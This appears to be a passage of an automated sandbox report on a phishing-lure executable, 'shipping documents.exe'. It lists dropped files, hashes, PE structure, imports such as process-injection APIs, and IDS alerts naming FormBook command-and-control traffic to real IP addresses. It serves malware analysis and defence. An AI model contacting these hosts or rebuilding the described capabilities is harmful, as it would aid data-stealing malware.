Preview:	EA06..p..^..y..e.L..[-.e4....y..sd.N,....e8.N.si..md..&..]....9...K........\|.0.o..d..,......:..@..;.Y'sP.......4.Z..o;..6.`.o.p..Y@.....g.;..f.P..Y@...N..i.........;......r.'Sy...c ....Ac.H.....(.F.3<..Y..6...4.d........x..n....Bv.....X. 0....+$.r...Y..5_..l.....5_..t.U..`5_....U...5_..d.U...5\..>30..N.^.c.Z..o8.z..s8......@.....s...G. /Z.N'`.....jv....r.u....$.../.s:...g G_T......l.>_.......zo7.........s@.......@...........`.M..`... ...e...@..8.'.6.Y.{>K$..c.M.`..Y'.._..t......>K #G.d..3\|vY..G.6.Yf.8_..oe..i\|vY....e.h.,.0......-..9.M..kE...Ng.P;..:.N..P.L..6...f..+(.ffvI...8.N.....f.@.E...Y....3.i.....N@......vi.....P.....2p....<d....,vf........N.!+(.'&`....,fs4...I.......r.4.X...c3.4.ih.Y.!...Gf.....,f.;.... .#9.....c.P........t.h.s.....,vj...$..t.L....40.....f....N.s....4..@.6.-..p..S.=..4...SP.N...;7.`..;.M.....o:.....c.p..Y.s.wx.....vp........E....N.y6....p.c3.5..6..b.!....F ...@B5e.Mgs........vr......fV[5.v...B3p....;:.X...c.NA..0........g@....&.<..e...

C:\Users\user\AppData\Local\Temp\nonplacental

Download File

Process:	C:\Users\user\Desktop\shipping documents.exe
File Type:	FGDC-STD-001-1998
Category:	dropped
Size (bytes):	28674
Entropy (8bit):	3.583802408287143
Encrypted:	false
SSDEEP:	768:PQKGjwsMMIfRupNm2cJ9soGbLph1jXtAP:PRhsMffRupNXtg
MD5:	023C60E39DFD3BA2D8DFC8BEFC270E86
SHA1:	9BA54A6C0798EEAEBEE9412DC7530A8FC7686B96
SHA-256:	CC5D4B8D55F5712B3F78966D7319F67D9EC2A2D71DF8E246F6616D46CC793A07
SHA-512:	8E85DE74402770AB893333C34BF5FDE5F321F0DDE8F5141B0B79837E8D2066C07EFC77D10E47C02491674C625D3FF08BA9C7BCFD77AC5D79384BE60DD5B84F90
Malicious:	false
Reputation:	low
Preview:	2z77:dge:3geee2422227879d:8d22222288:;67:6d;8722222288:;6f:8dc9422222288:;77::d:8g22222288:;67:cd;8722222288:;6f:edc8e22222288:;77:gd:5522222288:;67;2d;5422222288:;6f;4dc4g22222288:;77;6d:8622222288:;67;8d;8e22222288:;6f;:dc8e22222288:;77;c55e288:;67;ed;8g22222288:;:f66hhhhhhdc9622222288:;;768hhhhhhd:8622222288:;:76:hhhhhhd;8e22222288:;:f6chhhhhhdc8e22222288:;;76ehhhhhhd:4g22222288:;:76ghhhhhhd;8622222288:;:f72hhhhhhdc8e22222288:;;774hhhhhhd:8e22222288:;:776hhhhhh55e;88:;:f78hhhhhhdc9722222288:;77f2d:9522222288:;67f4d;8722222288:;6ff6dc9422222288:;77f8d:5522222288:;67f:d;5422222288:;6ffcdc4g22222288:;77fed:8622222288:;67fgd;8e22222288:;6fg2dc8e22222288:;77g455e288:;67g6d;8322222288:;:f8:hhhhhhdc8622222288:;;78chhhhhhd:9822222288:;:78ehhhhhhd;8322222288:;:f8ghhhhhhdc9222222288:;;792hhhhhhd:8;22222288:;:794hhhhhhd;5522222288:;:f96hhhhhhdc5422222288:;;798hhhhhhd:4g22222288:;:79:hhhhhhd;8622222288:;:f9chhhhhhdc8e22222288:;;79ehhhhhhd:8e22222288:;:79ghhhhhh55e;88:;6f:2dc9522222288:;77c2d:8:

C:\Users\user\AppData\Local\Temp\porcelainize

Download File

Process:	C:\Users\user\Desktop\shipping documents.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.99525176452656
Encrypted:	true
SSDEEP:	6144:OUxWryXv0ooCLk6eDp4spmBmGRMGC+zHxK7sNY9A:OYUIvho2eDEsGRMGLHxK7s+9A
MD5:	3BC6736E3CEB3D440C2642D40B2896DE
SHA1:	1675E8E2A3C73E7AC91F476DB0269153580A330A
SHA-256:	1C60549FFF6C88D8B62E9F3FA9D38F9A134B4CA0326CFA8BE38F71BBD890E2CB
SHA-512:	916AEE941C838EEC8242CCF04DF4733D3856C4A8B8C705BBFE1E786C8CB299D84B765F02710223A57814127D5F7136B83E68B1C27C3AD4249B74D4B2BBE1E71B
Malicious:	false
Reputation:	low
Preview:	.m...RPVU.._....z.UD...c5Z...EACV8GQ9F2UGS7NK6RPVUEACV8GQ9F.UGS9Q.8R._.d.B..f.Q/Au7!X)9W?p54+/,".%4.4G;g:Yn.y.p;:!$m[5Mu9F2UGS77J?.m62.\|#1.z1^.(....,.H...y!$."...zR2..^-#.27.UEACV8GQi.2U.R6NZoj0VUEACV8G.9D3^FX7N[2RPVUEACV8gD9F2EGS7nO6RP.UEQCV8EQ9@2UGS7NK0RPVUEACV.CQ9D2UGS7NI6..VUUACF8GQ9V2UWS7NK6R@VUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACxL")MF2U.\3NK&RPVEAACF8GQ9F2UGS7NK6RpVU%ACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.170546067727533
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	shipping documents.exe
File size:	1'216'000 bytes
MD5:	832d7c1846198763310af90dd8c04746
SHA1:	272b18a39bd6c0b459be994c722938ca20138dff
SHA256:	f9fa8f47333b24b20ff9c838d40e58f56c86ec5d9351e38a387bf5eba3356f06
SHA512:	17a8ec0fc795ddfea7be25a88054a9f484f14acf5c381d3f7f70ee22a90df67cd7995ad3748d595fc37056bb9f1522aa3cf3d19a8ded1d63c58907580a5aa760
SSDEEP:	24576:5AHnh+eWsN3skA4RV1Hom2KXMmHaxrjVmdbEiy0h5hAO5:Ah+ZkldoPK8Yaxrj+bEiye5hN
TLSH:	9C45BE0273D5C036FFAB92739B6AF64156BC78254133852F13982DB9BD701B2263E663
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66BA8248 [Mon Aug 12 21:44:40 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F2374DF535Dh
jmp 00007F2374DE8114h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F2374DE829Ah
cmp edi, eax
jc 00007F2374DE85FEh
bt dword ptr [004C41FCh], 01h
jnc 00007F2374DE8299h
rep movsb
jmp 00007F2374DE85ACh
cmp ecx, 00000080h
jc 00007F2374DE8464h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F2374DE82A0h
bt dword ptr [004BF324h], 01h
jc 00007F2374DE8770h
bt dword ptr [004C41FCh], 00000000h
jnc 00007F2374DE843Dh
test edi, 00000003h
jne 00007F2374DE844Eh
test esi, 00000003h
jne 00007F2374DE842Dh
bt edi, 02h
jnc 00007F2374DE829Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F2374DE82A3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F2374DE82F5h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x5e628	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x127000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	748cf1ab2605ce1fd72d53d912abb68f	False	0.32828818537859006	data	5.763244005758284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0x5e628	0x5e800	15f72690a35b7f52ca37e6eb3fa6c1d7	False	0.9298631779100529	data	7.899517605328803	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x127000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc85a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc86d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc87f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc8920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc8c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc8d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc9bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xca480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xca9e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xccf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xce038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xce4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xce4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcea84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcf110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcf5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcfb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xd01f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xd0660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xd07b8	0x558ee	data			1.0003310067742248
RT_GROUP_ICON	0x1260a8	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x126120	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x126134	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x126148	0x14	data	English	Great Britain	1.25
RT_VERSION	0x12615c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x126238	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-13T06:45:27.053610+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49745	80	192.168.2.5	194.58.112.174
2024-08-13T06:44:51.389961+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49735	80	192.168.2.5	199.192.19.19
2024-08-13T06:42:36.497567+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49711	80	192.168.2.5	5.44.111.162
2024-08-13T06:44:53.856835+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49736	80	192.168.2.5	199.192.19.19
2024-08-13T06:44:13.088129+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49729	80	192.168.2.5	23.251.54.212
2024-08-13T06:43:52.517461+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49724	80	192.168.2.5	43.252.167.188
2024-08-13T06:43:30.163849+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49720	80	192.168.2.5	208.91.197.27
2024-08-13T06:45:13.651730+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49741	80	192.168.2.5	91.195.240.19
2024-08-13T06:42:59.896735+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49716	80	192.168.2.5	217.160.0.106
2024-08-13T06:44:59.712324+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49737	80	192.168.2.5	213.145.228.16
2024-08-13T06:45:34.777244+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49748	80	192.168.2.5	194.58.112.174
2024-08-13T06:43:22.028285+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49717	80	192.168.2.5	208.91.197.27
2024-08-13T06:45:32.151383+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49747	80	192.168.2.5	194.58.112.174
2024-08-13T06:45:02.286411+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49738	80	192.168.2.5	213.145.228.16
2024-08-13T06:43:58.536135+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49725	80	192.168.2.5	194.9.94.85
2024-08-13T06:43:27.071473+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49719	80	192.168.2.5	208.91.197.27
2024-08-13T06:45:41.338068+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49749	80	192.168.2.5	172.67.210.102
2024-08-13T06:44:00.865225+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49726	80	192.168.2.5	194.9.94.85
2024-08-13T06:43:47.445622+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49722	80	192.168.2.5	43.252.167.188
2024-08-13T06:45:29.592116+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49746	80	192.168.2.5	194.58.112.174
2024-08-13T06:42:57.360686+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49715	80	192.168.2.5	217.160.0.106
2024-08-13T06:44:05.920117+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49728	80	192.168.2.5	194.9.94.85
2024-08-13T06:45:04.824823+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49739	80	192.168.2.5	213.145.228.16
2024-08-13T06:43:44.909839+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49721	80	192.168.2.5	43.252.167.188
2024-08-13T06:44:15.619420+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49730	80	192.168.2.5	23.251.54.212
2024-08-13T06:44:46.208108+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49733	80	192.168.2.5	199.192.19.19
2024-08-13T06:45:46.416615+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49751	80	192.168.2.5	172.67.210.102
2024-08-13T06:45:16.175119+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49742	80	192.168.2.5	91.195.240.19
2024-08-13T06:45:21.239206+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49744	80	192.168.2.5	91.195.240.19
